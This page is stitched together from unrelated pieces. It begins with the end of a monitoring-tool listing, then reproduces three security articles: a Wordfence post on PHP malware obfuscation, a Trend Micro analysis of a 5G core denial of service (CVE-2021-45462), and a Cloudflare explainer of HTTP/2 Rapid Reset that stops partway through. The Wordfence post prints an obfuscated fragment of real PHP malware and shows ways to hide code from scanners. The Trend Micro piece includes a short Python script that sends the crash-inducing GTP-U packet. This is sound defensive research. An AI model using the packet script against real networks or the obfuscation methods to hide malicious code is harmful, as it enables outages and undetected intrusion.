  • Uses a combination of packet sniffing, WMI, and SNMP to report network performance data
  • Fully customizable dashboard is great for both lone administrators as well as NOC teams
  • Drag and drop editor makes it easy to build custom views and reports
  • Supports a wide range of alert mediums such as SMS, email, and third-party integrations into platforms like Slack

CONS:

  • Is a very comprehensive platform with many features and moving parts that require time to learn

Start a 30-day free trial.

Source :
https://www.pcwdld.com/network-monitoring-tools-software/

Know Your Malware Part Two – Hacky Obfuscation Techniques

Ram Gall
November 1, 2023

In the first post in this series, we covered common PHP encoding techniques and how they’re used by malware to hide from security analysts and scanners. In today’s post, we’re going to dive a little bit deeper into other obfuscation techniques that make use of other features available in PHP.

Obfuscation Redux

In the first post in this series, we defined Obfuscation as the process of concealing the purpose or functionality of code or data so that it evades detection and is more difficult for a human or security software to analyze, but still fulfills its intended purpose. One of the main contributing factors to the popularity of PHP is its ease of use, but the same functionality that makes it easy to use also makes it easy to abuse, often in ways that were never intended.

The techniques covered in this post are often simpler and “hackier” than the ones listed in the previous article, and most of them are less reliable as indicators of malicious activity individually, as several of them typically need to be combined in order to achieve sufficient obfuscation. These techniques are also often easier for a human analyst to spot, but they are also more difficult to detect using scanning tools due to the wide variety of permutations available. Such simpler obfuscation methods can also be creatively combined with encoding techniques, granting malware authors a formidable array of tactics to avoid detection.

While it is not practical to cover every possible technique in active use, this article will detail the more commonly found methods, and help illustrate the wide range of possibilities when decoding obfuscated malware. Several of the methods we will cover today, such as comment abuse, can be combined into almost infinite variations with minute changes, thus rendering them completely undetectable to traditional hash-based malware scanning and even partially slowing down regular expression-based scanning of the type used by Wordfence.
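
To see why these variations hurt signature matching, consider a toy comparison between a literal signature and a comment-tolerant one. These are hypothetical patterns written with Python's re module, not actual Wordfence signatures:

import re

# A naive literal signature misses commented-up variants:
naive = re.compile(r'eval\(base64_decode\(')

# A comment-tolerant variant must allow /*...*/ between every token,
# which is more expensive to match and easy to mis-specify:
c = r'(?:/\*.*?\*/)*\s*'
tolerant = re.compile(rf'eval{c}\({c}base64_decode{c}\(', re.S)

sample = 'eval/*x*/ (/*y*/base64_decode/*z*/($payload));'
print(bool(naive.search(sample)))     # False
print(bool(tolerant.search(sample)))  # True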

Fortunately, while these methods do make analysis more difficult, and can slow down scanning, their presence in certain combinations is a strong signal of malicious activity, and the malware detection signatures used by the Wordfence plugin and Wordfence CLI are tuned to detect these combinations with astoundingly few false positives. Wordfence CLI in particular is useful in these cases, as it is highly performant and can run multithreaded jobs, compensating for any speed penalties imposed by these techniques.

Comment Abuse

PHP has several methods of adding code comments that you may already be familiar with. Well-commented code is considered a best practice, as it makes it much easier to maintain software and pay off technical debt, but comments can also be used for illicit purposes.

PHP uses three styles of comments:

//, denoting a single line comment that ends on the next line.

#, likewise a single line comment that ends on the next line, though this is less common than ‘//’.

/*, the beginning of a multiline comment, which can only be closed with */.

Multiline comments are particularly useful to malware authors because they are ignored by PHP, and do not have to extend over multiple lines. This means that an attacker can “break up” their code to evade scanners using comments. For instance, the following code block prints “Hello, World!”:

<?php
echo/*blah*/"Hello, World!"/*blah*/;

While this is a very basic example, more complicated examples can be found in real malware, such as the following snippet, which makes use of several additional obfuscation techniques, including octal escape sequences and invisible null bytes:

<?php        function/*ti*/ed_ixpn(){     echo/* o_lpl*/20508;  }$disdcrxh_/* ohgvr*/= 'disdcrxh_'/*  _jnsm  */^       '';$zggkgqda= "\146".     "\151".$disdcrxh_(361-253)   ./* qts   */"e"."_".$disdcrxh_(564-452)/* rxw*/.     $disdcrxh_(1006-889)     . "t".$disdcrxh_(952-857) ./*  w  */"c".$disdcrxh_(111) ./*fcup  */"n".$disdcrxh_(162-46)/*   djtrl   */./*  pwdn  */"e".$disdcrxh_(407-297)      .      $disdcrxh_(854-738) . $disdcrxh_(115);

While we’re not going to fully analyze this malware today, it already presents problems for many scanners. For instance, a scanner searching for the very first line of code, function ed_ixpn(), would fail to find it because of the comments. While detection using regular expressions, such as those used by the Wordfence plugin scanner and Wordfence CLI, is capable of catching malware of this type, it still imposes a performance penalty on detection due to the enormous number of possible variations.
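
One countermeasure an analyst can apply before searching a sample is to normalize it, for example by replacing block comments with a space. Here is a quick sketch in Python; it deliberately ignores edge cases such as comment markers inside string literals:

import re

def normalize(php_source: str) -> str:
    # Replace /*...*/ comments with a space so split-up tokens rejoin,
    # then collapse runs of whitespace.
    no_comments = re.sub(r'/\*.*?\*/', ' ', php_source, flags=re.S)
    return re.sub(r'\s+', ' ', no_comments)

sample = "function/*ti*/ed_ixpn(){     echo/* o_lpl*/20508;  }"
print(normalize(sample))   # function ed_ixpn(){ echo 20508; }

After normalization, a naive search for function ed_ixpn() succeeds again.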

Concatenation Catastrophe

PHP makes string concatenation very simple via the dot . operator. This allows programmers to join two separate strings with minimal hassle. For instance, the following code outputs “Hello, World!”:

<?php echo "He"."llo, "."Wor"."ld!";

There are a large number of legitimate use cases for string concatenation, so it’s generally only an indicator of malicious activity when combined with several other obfuscation techniques. The malware sample we shared earlier provides a good example of this, with octal encoding concatenated with the return values of various functions, which we’ll get to in a later section.

Index Fun

PHP, like most languages, stores text strings as arrays of characters, each with a defined position or index. This makes it possible to assemble arbitrary commands and data from a string containing the required characters, using the array index of each character and the concatenation operator. For instance, the following code prints “Hello, World!”:

<?php
$string = "Wow, what a cool Helpful research device!";
echo $string[17].$string[18].$string[19].$string[19].$string[1].$string[3].$string[4].$string[0].$string[1].$string[25].$string[15].$string[34].$string[40];

PHP arrays start with an index of 0, meaning that $string[0] in the example above would be “W”, the first letter of “Wow, what a cool Helpful research device!”. By concatenating letters from different parts of that text string, it’s possible to assemble an entirely different text string.

This method can be very helpful for hiding the underlying text being assembled from human researchers and security scan tools alike. Though it has the occasional legitimate use in selecting chunks of text, extensive use of this technique is a strong indicator of malicious activity, though it typically needs to be combined with additional techniques such as evaluating the resulting string or passing it to a function.

Math, Not Even Once

PHP allows mathematical operations to be embedded within other functionality. The malware snippet shown earlier demonstrates this with $disdcrxh_(564-452), which resolves to $disdcrxh_(112) once 452 is subtracted from 564 inside the parentheses. This functionality can likewise be combined with the string index technique mentioned above. For example, the following code prints out “Hello, World!”:

<?php
$string = "Wow, what a cool Helpful research device!";
echo $string[(15+2)].$string[(20-2)].$string[(10+9)].$string[(29-10)].$string[(5-4)].$string[(1+2)].$string[(2+2)].$string[(5-5)].$string[(12-11)].$string[(5*5)].$string[(5*3)].$string[34].$string[(160/4)];

This adds an additional obfuscation layer that can make it even more difficult to determine the code’s functionality without executing it. However, it is incredibly rare for this type of code to be used legitimately, so the presence of this technique is typically an indicator of malicious activity.

String Reversals

One of the most basic functions in PHP’s text string manipulation libraries is strrev, which is used to reverse strings of text. For instance, the following code snippet prints out “Hello, World!”:

<?php echo strrev("!dlroW ,olleH");

While not particularly effective at obfuscation on its own, it can be combined with the techniques in this article as well as nearly all of the techniques in our previous article on encoding to make it even more difficult to decode malicious functionality. While it has a number of legitimate use cases, the presence of strrev alongside two or more additional encoding or obfuscation techniques is often a reliable indicator of compromise.

Variable, Dynamic, and Anonymous Functions

PHP can store function names in variables and then invoke those functions through the variable. This is widely used by legitimate software, but it can also be combined with several other techniques, such as string concatenation, in which case it is often an indicator of malicious activity. For instance, the following code snippet prints out “Hello, World!”:

<?php $hello='pri'.'ntf';
$string='Hello, World!';
$hello($string);

This can also be combined with dynamic function invocation using methods such as call_user_func, which accepts a function for its first parameter and any arguments to be passed to that function in subsequent parameters. As with variable function names, this is widely used in legitimate code, but it can still make analysis more difficult, especially for automated tools looking primarily for more basic function call syntax. For example, the following code snippet prints out “Hello, World!”:

<?php $hello='pri'.'ntf';
$string='Hello, World!';
$call='call_user_func';
$call($hello, $string);

Finally, PHP also allows for anonymous functions, which are exactly what they sound like – functions without a name. These can be combined with variable assignment as shown:

<?php
$hello = function() {
    printf("Hello, World!");
};
$hello();

While anonymous functions are widely used in legitimate code, it is possible to use them in combination with other features to make it more difficult for automated scanning tools or human analysts to keep track of code flow and as such are useful for obfuscation.

We’ve begun to combine obfuscation layers in our examples to provide a better picture of the type of obfuscation often found in the wild, and there’s still more to come.

GOTO Labels

One of the oldest and most basic code functions is the goto statement. While some legitimate software still uses GOTO statements, the functionality is considered poor coding practice and is not widely used, though it reflects how the code operates at a fundamental level far more accurately than more modern syntax. Its primary use in obfuscation is similar to comment abuse in that it breaks up the code so that it is more difficult to determine the control flow.

For example, the following code snippet prints out “Hello, World!” if and only if $_GET['input'] is present and set to ‘hello’, otherwise it prints “Sorry”:

<?php
$hello='pri'.'ntf';
$string='Hello, World!';
if(isset($_GET['input']) && $_GET['input']=='hello'){
    goto printyes;
}
else
    goto printno;
printyes:
echo "Hello, World!";
goto end;
printno:
echo "Sorry";
end:
?>

Include/Require of non-PHP files

PHP uses the include and require functions to include and execute code located in a separate file. This is almost universally used, and occasionally the .inc extension is used instead of .php for files to be included. However, one particular feature that is ripe for abuse is that PHP will include files with any extension and execute them as code. This allows attackers to upload the bulk of their malicious code as a file with an allowed extension, often an image extension such as .ico or .png, and then simply include that file from a loader file with a PHP extension. Inclusion of files without a .php or .inc extension is thus almost always an indicator of malicious activity.

For instance, take the following set of files:

loader.php:

<?php include('hello.ico');

hello.ico:

<?php echo "Hello, World!";

This will print out “Hello, World!” when loader.php is executed, even though hello.ico does not have a PHP extension and would not run as PHP if accessed directly.

Putting it All Together

Here’s an example that makes use of everything we’ve learned today apart from including files:

<?php
$string=/*blah*/"Wow, what a cool Helpful research device!"/*blah*/;
$mashed=$string[(160/4)]./*blah*/$string[34]./*blah*/$string[(5*3)]/*blah*/.$string[(5*5)]/*blah*/.$string[(12-11)]./*blah*/$string[(5-5)]./*blah*//*blah*/$string[(2+2)]./*blah*/$string[(1+2)]./*blah*/$string[(5-4)]/*blah*/.$string[(29-10)]./*blah*/$string[(10+9)]./*blah*/$string[(20-2)]/*blah*/.$string[(15+2)];
function/*blah*/echostring(/*blah*/$str/*blah*/){
    echo/*blah*/$str;
    return/*blah*/;
}
$rev/*blah*/=/*blah*/function($str){
    return/*blah*/strrev($str);
};
goto/*blah*/dostuff;
echo/*blah*/"That didn't work!";
dostuff/*blah*/:
    call_user_func(/*blah*/'echostring',/*blah*/$rev(/*blah*/$mashed));

It begins with comments breaking up the code as well as the concatenation and string indexing techniques we covered earlier, which assigns “Hello, World!” in reverse, or “!dlroW ,olleH” to the $mashed variable.

A quick glance at the code might lead you to believe that it outputs “That didn’t work!” but thanks to the goto statement that line of code is skipped – such misleading uses are par for the course with malware that uses goto statements.

In the dostuff section, we use call_user_func to call the echostring function, which really just does the same thing as echo but serves as an additional layer of obfuscation to untangle, especially if the function were to be given a less friendly name. The echostring function is fed the output of the anonymous function assigned to the $rev variable, which again simply performs a strrev on the input. The result is that $mashed is reversed and echoed out as “Hello, World!”. While we have kept the function and variable names relatively relevant for this example, there’s nothing preventing a malware author from naming these functions whatever they want, and indeed, misleading or nonsensical function names are more common than meaningful or useful function names in PHP malware.

Conclusion

In today’s post, we covered a number of the more creative, or “hacky” malware obfuscation techniques in widespread use, and showed examples of how they can be combined to make it difficult to analyze code functionality. All of these techniques can also be combined with the techniques in our previous post on malware obfuscation to make life even more difficult for analysts and security scanners. These two posts cover the most popular obfuscation methods used by PHP malware, but there are even more advanced and sophisticated techniques, including genuine encryption, which we will cover in our next article, alongside less commonly-used functionality.

PHP malware is constantly evolving, and our malware analysts release dozens of detection signatures every month, which can be used by the Wordfence scanner as well as by Wordfence CLI. While the vast majority of new signatures will only be made available to Wordfence Premium, Wordfence Care, Wordfence Response, and the paid Wordfence CLI tiers, the free version of Wordfence and Wordfence CLI still offer excellent detection capabilities, and include our broadest signature set, which in our testing detects at least one indicator of compromise on more than 90% of infected sites. We also plan to periodically update our free signature set with signatures that detect the most widespread malware from our full signature set.

Once again, we encourage readers who want to learn more about this to experiment with the various code snippets we have presented. As always, be sure to be careful with any actual malware samples you find and only execute them in a hardened virtual environment, as even PHP malware can be used for local privilege escalation on vulnerable machines.

For security researchers looking to disclose vulnerabilities responsibly and obtain a CVE ID, you can submit your findings to Wordfence Intelligence and potentially earn a spot on our leaderboard.


Source :
https://www.wordfence.com/blog/2023/11/know-your-malware-part-two-hacky-obfuscation-techniques/

Attacks on 5G Infrastructure From Users’ Devices

By: Salim S.I.
September 20, 2023
Read time: 8 min (2105 words)

Crafted packets from cellular devices such as mobile phones can exploit faulty state machines in the 5G core to attack cellular infrastructure. Smart devices that critical industries such as defense, utilities, and the medical sectors use for their daily operations depend on the speed, efficiency, and productivity brought by 5G. This entry describes CVE-2021-45462 as a potential use case to deploy a denial-of-service (DoS) attack to private 5G networks.

5G unlocks unprecedented applications previously unreachable with conventional wireless connectivity to help enterprises accelerate digital transformation, reduce operational costs, and maximize productivity for the best return on investments. To achieve its goals, 5G relies on key service categories: massive machine-type communications (mMTC), enhanced mobile broadband (eMBB), and ultra-reliable low-latency communication (uRLLC).

With the growing spectrum for commercial use, usage and popularization of private 5G networks are on the rise. The manufacturing, defense, ports, energy, logistics, and mining industries are just some of the earliest adopters of these private networks, especially for companies rapidly leaning on the internet of things (IoT) for digitizing production systems and supply chains. Unlike public grids, the cellular infrastructure equipment in private 5G might be owned and operated by the user-enterprise themselves, system integrators, or by carriers. However, given the growing study and exploration of the use of 5G for the development of various technologies, cybercriminals are also looking into exploiting the threats and risks that can be used to intrude into the systems and networks of both users and organizations via this new communication standard. This entry explores how normal user devices can be abused in relation to 5G’s network infrastructure and use cases.

5G topology

In an end-to-end 5G cellular system, user equipment (aka UE, such as mobile phones and internet-of-things [IoT] devices) connects to a base station via radio waves. The base station is connected to the 5G core through a wired IP network.

Functionally, the 5G core can be split into two: the control plane and the user plane. In the network, the control plane carries the signals and facilitates the traffic based on how it is exchanged from one endpoint to another. Meanwhile, the user plane functions to connect and process the user data that comes over the radio area network (RAN).

The base station sends control signals related to device attachment and establishes the connection to the control plane via NGAP (Next-Generation Application Protocol). The user traffic from devices is sent to the user plane using GTP-U (GPRS tunneling protocol user plane). From the user plane, the data traffic is routed to the external network. 

Figure 1. The basic 5G network infrastructure

The UE subnet and infrastructure network are separate and isolated from each other; user equipment is not allowed to access infrastructure components. This isolation helps protect the 5G core from CT (Cellular Technology) protocol attacks generated from users’ equipment.

Is there a way to get past this isolation and attack the 5G core? The next sections elaborate on how cybercriminals could abuse components of the 5G infrastructure, particularly the GTP-U.

GTP-U

GTP-U is a tunneling protocol that exists between the base station and 5G user plane using port 2152. The following is the structure of a user data packet encapsulated in GTP-U.

Figure 2. GTP-U data packet

A GTP-U tunnel packet is created by attaching a header to the original data packet. The added header consists of a UDP (User Datagram Protocol) transport header plus a GTP-U specific header. The GTP-U header consists of the following fields:

  • Flags: This contains the version and other information (such as an indication of whether optional header fields are present, among others).
  • Message type: For GTP-U packet carrying user data, the message type is 0xFF.
  • Length: This is the length in bytes of everything that comes after the Tunnel Endpoint Identifier (TEID) field.
  • TEID: Unique value for a tunnel that maps the tunnel to user devices

The GTP-U header is added by the GTP-U nodes (the base station and User Plane Function or UPF). However, the user cannot see the header on the user interface of the device. Therefore, user devices cannot manipulate the header fields.
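
For concreteness, those four mandatory fields pack into an eight-byte header. Here is a minimal sketch in Python; the field values are illustrative, and real TEIDs are assigned per tunnel by the network:

# The four mandatory GTP-U header fields packed into their 8-byte wire layout.
import struct

flags = 0x30      # version 1, protocol type GTP (PT=1), no optional fields
msg_type = 0xFF   # G-PDU: the packet carries user data
payload = b"<inner IP packet goes here>"
length = len(payload)          # bytes after the TEID field
teid = 0x00001234              # tunnel endpoint identifier (illustrative)

gtpu_packet = struct.pack("!BBHI", flags, msg_type, length, teid) + payload
print(gtpu_packet.hex())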

Although GTP-U is a standard tunneling technique, its use is mostly restricted to CT environments between the base station and the UPF or between UPFs. Assuming the best scenario, the backhaul between the base station and the UPF is encrypted, protected by a firewall, and closed to outside access. Here is a breakdown of the ideal scenario: GSMA recommends IP security (IPsec) between the base station and the UPF. In such a scenario, packets going to the GTP-U nodes come from authorized devices only. If these devices follow specifications and implement them well, none of them will send anomalous packets. Besides, robust systems are expected to have strong sanity checks to handle received anomalies, especially obvious ones such as invalid lengths, types, and extensions, among others.

In reality, however, the scenario could often be different and would require a different analysis altogether. Operators are reluctant to deploy IPsec on the N3 interface because it is CPU-intensive and reduces the throughput of user traffic. Also, since the user data is perceived to be protected at the application layer (with additional protocols such as TLS or Transport Layer Security), some consider IP security redundant. One might think that as long as the base station and packet core conform to the specification, there will be no anomalies, and that robust systems will have sanity checks to catch any obvious anomalies. However, previous studies have shown that many N3 nodes (such as UPF) around the world, although they should not be, are exposed to the internet. This is shown below.


Figure 3. Exposed UPF interfaces due to misconfigurations or lack of firewalls; screenshot taken from Shodan and used in a previously published research

We discuss two concepts that can exploit the GTP-U using CVE-2021-45462. In Open5GS, a C-language open-source implementation for 5G Core and Evolved Packet Core (EPC), sending a zero-length, type=255 GTP-U packet from the user device resulted in a denial of service (DoS) of the UPF. This is CVE-2021-45462, a security gap in the packet core that can crash the UPF (in 5G) or the Serving Gateway User Plane Function (SGW-U in 4G/LTE) via an anomalous GTP-U packet that is crafted on the UE and tunneled inside legitimate GTP-U traffic. Given that the exploit affects a critical component of the infrastructure and cannot be resolved easily, the vulnerability has received a Medium to High severity rating.

GTP-U nodes: Base station and UPF

GTP-U nodes are endpoints that encapsulate and decapsulate GTP-U packets. The base station is the GTP-U node on the user device side. As the base station receives user data from the UE, it converts the data to IP packets and encapsulates it in the GTP-U tunnel.

The UPF is the GTP-U node on the 5G core (5GC) side. When it receives a GTP-U packet from the base station, the UPF decapsulates the outer GTP-U header and takes out the inner packet. The UPF looks up the destination IP address in a routing table (also maintained by the UPF) without checking the content of the inner packet, after which the packet is sent on its way.

GTP-U in GTP-U

What if a user device crafts an anomalous GTP-U packet and sends it to a packet core?

Figure 4. A specially crafted anomalous GTP-U packet
Figure 5. Sending an anomalous GTP-U packet from the user device

As intended, the base station will tunnel this packet inside its own GTP-U tunnel and send it to the UPF. This results in a GTP-U-in-GTP-U packet arriving at the UPF. There are now two GTP-U headers in the UPF: the outer GTP-U header is created by the base station to encapsulate the data packet from the user device. This outer GTP-U packet has 0xFF as its message type and a length of 44. This header is normal. The inner GTP-U header is crafted and sent by the user device as a data packet. Like the outer one, this inner GTP-U has 0xFF as its message type, but its length of 0 is not normal.

The source IP address of the inner packet belongs to the user device, while the source IP address of the outer packet belongs to the base station. Both inner and outer packets have the same destination IP address: that of the UPF.
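
Under lab conditions, the UE-side trigger described above takes only a few lines of Python, as noted later in this article. The sketch below sends the anomalous eight-byte GTP-U header as ordinary user data; the UPF address is a placeholder, and this should only ever be pointed at a test core you own (for example, an unpatched Open5GS lab instance):

import socket
import struct

UPF_N3_ADDRESS = ("192.0.2.10", 2152)   # hypothetical lab UPF address

# Anomalous inner GTP-U header: version 1 (flags 0x30), message type 0xFF,
# length 0, arbitrary TEID. The base station wraps this in a legitimate
# outer GTP-U tunnel, so GTP-U-in-GTP-U arrives at the UPF.
inner = struct.pack("!BBHI", 0x30, 0xFF, 0, 0x1234)

with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
    sock.sendto(inner, UPF_N3_ADDRESS)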

The UPF decapsulates the outer GTP-U and passes the functional checks. The inner GTP-U packet’s destination is again the same UPF. What happens next is implementation-specific:

  • Some implementations maintain a state machine for packet traversal. Improper implementation of the state machine might result in processing this inner GTP-U packet. This packet might have passed the checks phase already since it shares the same packet-context with the outer packet. This leads to having an anomalous packet inside the system, past sanity checks.
  • Since the inner packet’s destination is the IP address of UPF itself, the packet might get sent to the UPF. In this case, the packet is likely to hit the functional checks and therefore becomes less problematic than the previous case.

Attack vector

Some 5G core vendors leverage Open5GS code. For example, NextEPC (4G system, rebranded as Open5GS in 2019 to add 5G, with remaining products from the old brand) has an enterprise offer for LTE/5G, which draws from Open5GS’ code. No attacks or indications of threats in the wild have been observed, but our tests indicate potential risks using the identified scenarios.

The significance of the attack lies in the attack vector: this is cellular infrastructure attacked from the UE. The exploit only requires a mobile phone (or a computer connected via a cellular dongle) and a few lines of Python code to abuse the opening and mount this class of attack. GTP-U-in-GTP-U is a well-known technique, and backhaul IP security and encryption do not prevent this attack. In fact, these security measures might hinder the firewall from inspecting the content.

Remediation and insights

Critical industries such as the medical and utility sectors are just some of the early adopters of private 5G systems, and the breadth and depth of their use are only expected to grow further. Reliability for continuous, uninterrupted operations is critical for these industries as there are lives and real-world implications at stake. The foundational function of these sectors is the reason that they choose to use a private 5G system over Wi-Fi. It is imperative that private 5G systems offer unfailing connectivity, as a successful attack on any 5G infrastructure could bring the entire network down.

In this entry, the abuse of CVE-2021-45462 can result in a DoS attack. The root cause of CVE-2021-45462 (and most GTP-U-in-GTP-U attacks) is the improper error checking and error handling in the packet core. While GTP-U-in-GTP-U itself is harmless, the proper fix for the gap has to come from the packet-core vendor, and infrastructure admins must use the latest versions of the software.

A GTP-U-in-GTP-U attack can also be used to leak sensitive information such as the IP addresses of infrastructure nodes. GTP-U peers should therefore be prepared to handle GTP-U-in-GTP-U packets. In CT environments, they should use an intrusion prevention system (IPS) or firewalls that can understand CT protocols. Since GTP-U is not normal user traffic, especially in private 5G, security teams can prioritize and drop GTP-U-in-GTP-U traffic.
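
As a sketch of what such an inspection rule can look for: after decapsulating the outer tunnel, if the inner user packet is itself UDP traffic addressed to the GTP-U port, it can be flagged or dropped. The simplified Python below handles IPv4 only and is an illustration, not a production filter:

import struct

GTPU_PORT = 2152

def is_gtpu_in_gtpu(inner_ip_packet: bytes) -> bool:
    # IPv4 only, for brevity.
    if len(inner_ip_packet) < 20 or inner_ip_packet[0] >> 4 != 4:
        return False
    ihl = (inner_ip_packet[0] & 0x0F) * 4          # IPv4 header length
    if inner_ip_packet[9] != 17 or len(inner_ip_packet) < ihl + 8:
        return False                                # not UDP, or truncated
    (dport,) = struct.unpack("!H", inner_ip_packet[ihl + 2:ihl + 4])
    return dport == GTPU_PORT                       # nested GTP-U traffic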

As a general rule, the registration and use of SIM cards must be strictly regulated and managed. An attacker with a stolen SIM card could insert it into their own device to connect to a network for malicious deployments. Moreover, the responsibility for security can be ambiguous in a shared operating model where, for example, the end devices and the edge of the infrastructure chain are owned by the enterprise while the cellular infrastructure is owned by the integrator or carrier. This presents a hard task for security operation centers (SOCs), which must bring relevant information together from different domains and solutions.

In addition, due to the downtime and tests required, updating critical infrastructure software regularly to keep up with vendors' patches is not easy, nor will it ever be. Virtual patching with IPS or layered firewalls is thus strongly recommended. Fortunately, GTP-U-in-GTP-U is rarely used in real-world applications, so it might be safe to completely block all GTP-U-in-GTP-U traffic. We recommend using layered security solutions that combine IT and communications technology (CT) security and visibility. Implementing zero-trust solutions, such as Trend Micro™ Mobile Network Security, powered by CTOne, adds another security layer for enterprises and critical industries by preventing the unauthorized use of their private networks and by ensuring that the SIM is used only from an authorized device, supporting a continuous and undisrupted industrial ecosystem. Mobile Network Security also brings CT and IT security into a unified visibility and management console.

Source :
https://www.trendmicro.com/it_it/research/23/i/attacks-on-5g-infrastructure-from-users-devices.html

HTTP/2 Rapid Reset: deconstructing the record-breaking attack

10/10/2023

Lucas Pardue
Julien Desgats

Starting on Aug 25, 2023, we began to notice some unusually large HTTP attacks hitting many of our customers. These attacks were detected and mitigated by our automated DDoS system. It was not long, however, before they started to reach record-breaking sizes, eventually peaking just above 201 million requests per second. This was nearly 3x larger than our previous biggest attack on record.

What is concerning is that the attacker was able to generate such an attack with a botnet of merely 20,000 machines. There are botnets today that are made up of hundreds of thousands or millions of machines. Given that the entire web typically sees only between 1 and 3 billion requests per second, it’s not inconceivable that this method could focus an entire web’s worth of requests on a small number of targets.

Detecting and Mitigating

This was a novel attack vector at an unprecedented scale, but Cloudflare’s existing protections were largely able to absorb the brunt of the attacks. While initially we saw some impact to customer traffic — affecting roughly 1% of requests during the initial wave of attacks — today we’ve been able to refine our mitigation methods to stop the attack for any Cloudflare customer without it impacting our systems.

We noticed these attacks at the same time two other major industry players — Google and AWS — were seeing the same. We worked to harden Cloudflare’s systems to ensure that, today, all our customers are protected from this new DDoS attack method without any customer impact. We’ve also participated with Google and AWS in a coordinated disclosure of the attack to impacted vendors and critical infrastructure providers.

This attack was made possible by abusing some features of the HTTP/2 protocol and server implementation details (see CVE-2023-44487 for details). Because the attack abuses an underlying weakness in the HTTP/2 protocol, we believe any vendor that has implemented HTTP/2 will be subject to the attack. This includes every modern web server. We, along with Google and AWS, have disclosed the attack method to web server vendors, who we expect will implement patches. In the meantime, the best defense is using a DDoS mitigation service like Cloudflare’s in front of any web-facing web or API server.

This post dives into the details of the HTTP/2 protocol, the feature that attackers exploited to generate these massive attacks, and the mitigation strategies we took to ensure all our customers are protected. Our hope is that by publishing these details other impacted web servers and services will have the information they need to implement mitigation strategies. And, moreover, the HTTP/2 protocol standards team, as well as teams working on future web standards, can better design them to prevent such attacks.

RST attack details

HTTP is the application protocol that powers the Web. HTTP Semantics are common to all versions of HTTP — the overall architecture, terminology, and protocol aspects such as request and response messages, methods, status codes, header and trailer fields, message content, and much more. Each individual HTTP version defines how semantics are transformed into a “wire format” for exchange over the Internet. For example, a client has to serialize a request message into binary data and send it, then the server parses that back into a message it can process.

HTTP/1.1 uses a textual form of serialization. Request and response messages are exchanged as a stream of ASCII characters, sent over a reliable transport layer like TCP, using the following format (where CRLF means carriage-return and linefeed):

 HTTP-message   = start-line CRLF
                   *( field-line CRLF )
                   CRLF
                   [ message-body ]

For example, a very simple GET request for https://blog.cloudflare.com/ would look like this on the wire:

GET / HTTP/1.1 CRLFHost: blog.cloudflare.comCRLFCRLF

And the response would look like:

HTTP/1.1 200 OK CRLFServer: cloudflareCRLFContent-Length: 100CRLFContent-Type: text/html; charset=UTF-8CRLFCRLF<100 bytes of data>

This format frames messages on the wire, meaning that it is possible to use a single TCP connection to exchange multiple requests and responses. However, the format requires that each message is sent whole. Furthermore, in order to correctly correlate requests with responses, strict ordering is required, meaning that messages are exchanged serially and cannot be multiplexed. Two GET requests, for https://blog.cloudflare.com/ and https://blog.cloudflare.com/page/2/, would be:

GET / HTTP/1.1 CRLFHost: blog.cloudflare.comCRLFCRLFGET /page/2/ HTTP/1.1 CRLFHost: blog.cloudflare.comCRLFCRLF

With the responses:

HTTP/1.1 200 OK CRLFServer: cloudflareCRLFContent-Length: 100CRLFContent-Type: text/html; charset=UTF-8CRLFCRLF<100 bytes of data>CRLFHTTP/1.1 200 OK CRLFServer: cloudflareCRLFContent-Length: 100CRLFContent-Type: text/html; charset=UTF-8CRLFCRLF<100 bytes of data>

Web pages require more complicated HTTP interactions than these examples. When visiting the Cloudflare blog, your browser will load multiple scripts, styles and media assets. If you visit the front page using HTTP/1.1 and decide quickly to navigate to page 2, your browser can pick from two options. Either wait for all of the queued up responses for the page that you no longer want before page 2 can even start, or cancel in-flight requests by closing the TCP connection and opening a new connection. Neither of these is very practical. Browsers tend to work around these limitations by managing a pool of TCP connections (up to 6 per host) and implementing complex request dispatch logic over the pool.
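
As a concrete illustration of this serialized exchange, here is a minimal Python sketch that reuses one TLS connection for the two requests above, reading each response before the next request can usefully proceed. The crude single recv() stands in for proper Content-Length parsing.

    import socket
    import ssl

    host = "blog.cloudflare.com"
    ctx = ssl.create_default_context()
    with socket.create_connection((host, 443)) as raw:
        with ctx.wrap_socket(raw, server_hostname=host) as s:
            for path in ("/", "/page/2/"):
                s.sendall(f"GET {path} HTTP/1.1\r\nHost: {host}\r\n\r\n".encode())
                # HTTP/1.1 forces this response to be read before the next one
                # can begin; a real client parses Content-Length instead of
                # doing one crude recv().
                print(s.recv(4096).split(b"\r\n", 1)[0])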

HTTP/2 addresses many of the issues with HTTP/1.1. Each HTTP message is serialized into a set of HTTP/2 frames that have type, length, flags, stream identifier (ID) and payload. The stream ID makes it clear which bytes on the wire apply to which message, allowing safe multiplexing and concurrency. Streams are bidirectional. Clients send frames and servers reply with frames using the same ID.

In HTTP/2 our GET request for https://blog.cloudflare.com would be exchanged across stream ID 1, with the client sending one HEADERS frame, and the server responding with one HEADERS frame, followed by one or more DATA frames. Client requests always use odd-numbered stream IDs, so subsequent requests would use stream ID 3, 5, and so on. Responses can be served in any order, and frames from different streams can be interleaved.

Stream multiplexing and concurrency are powerful features of HTTP/2. They enable more efficient usage of a single TCP connection. HTTP/2 optimizes resource fetching, especially when coupled with prioritization. On the flip side, making it easy for clients to launch large amounts of parallel work can increase the peak demand for server resources when compared to HTTP/1.1. This is an obvious vector for denial-of-service.

In order to provide some guardrails, HTTP/2 provides a notion of maximum active concurrent streams. The SETTINGS_MAX_CONCURRENT_STREAMS parameter allows a server to advertise its limit of concurrency. For example, if the server states a limit of 100, then only 100 requests can be active at any time. If a client attempts to open a stream above this limit, it must be rejected by the server using a RST_STREAM frame. Stream rejection does not affect the other in-flight streams on the connection.

The true story is a little more complicated. Streams have a lifecycle. Below is a diagram of the HTTP/2 stream state machine. Client and server manage their own views of the state of a stream. HEADERS, DATA and RST_STREAM frames trigger transitions when they are sent or received. Although the views of the stream state are independent, they are synchronized.

HEADERS and DATA frames include an END_STREAM flag that, when set to the value 1 (true), can trigger a state transition.

Let’s work through this with an example of a GET request that has no message content. The client sends the request as a HEADERS frame with the END_STREAM flag set to 1. The client first transitions the stream from idle to open state, then immediately transitions into half-closed state. The client half-closed state means that it can no longer send HEADERS or DATA, only WINDOW_UPDATE, PRIORITY or RST_STREAM frames. It can, however, receive any frame.

Once the server receives and parses the HEADERS frame, it transitions the stream state from idle to open and then half-closed, so it matches the client. The server half-closed state means it can send any frame but receive only WINDOW_UPDATE, PRIORITY or RST_STREAM frames.

The response to the GET contains message content, so the server sends HEADERS with END_STREAM flag set to 0, then DATA with END_STREAM flag set to 1. The DATA frame triggers the transition of the stream from half-closed to closed on the server. When the client receives it, it also transitions to closed. Once a stream is closed, no frames can be sent or received.

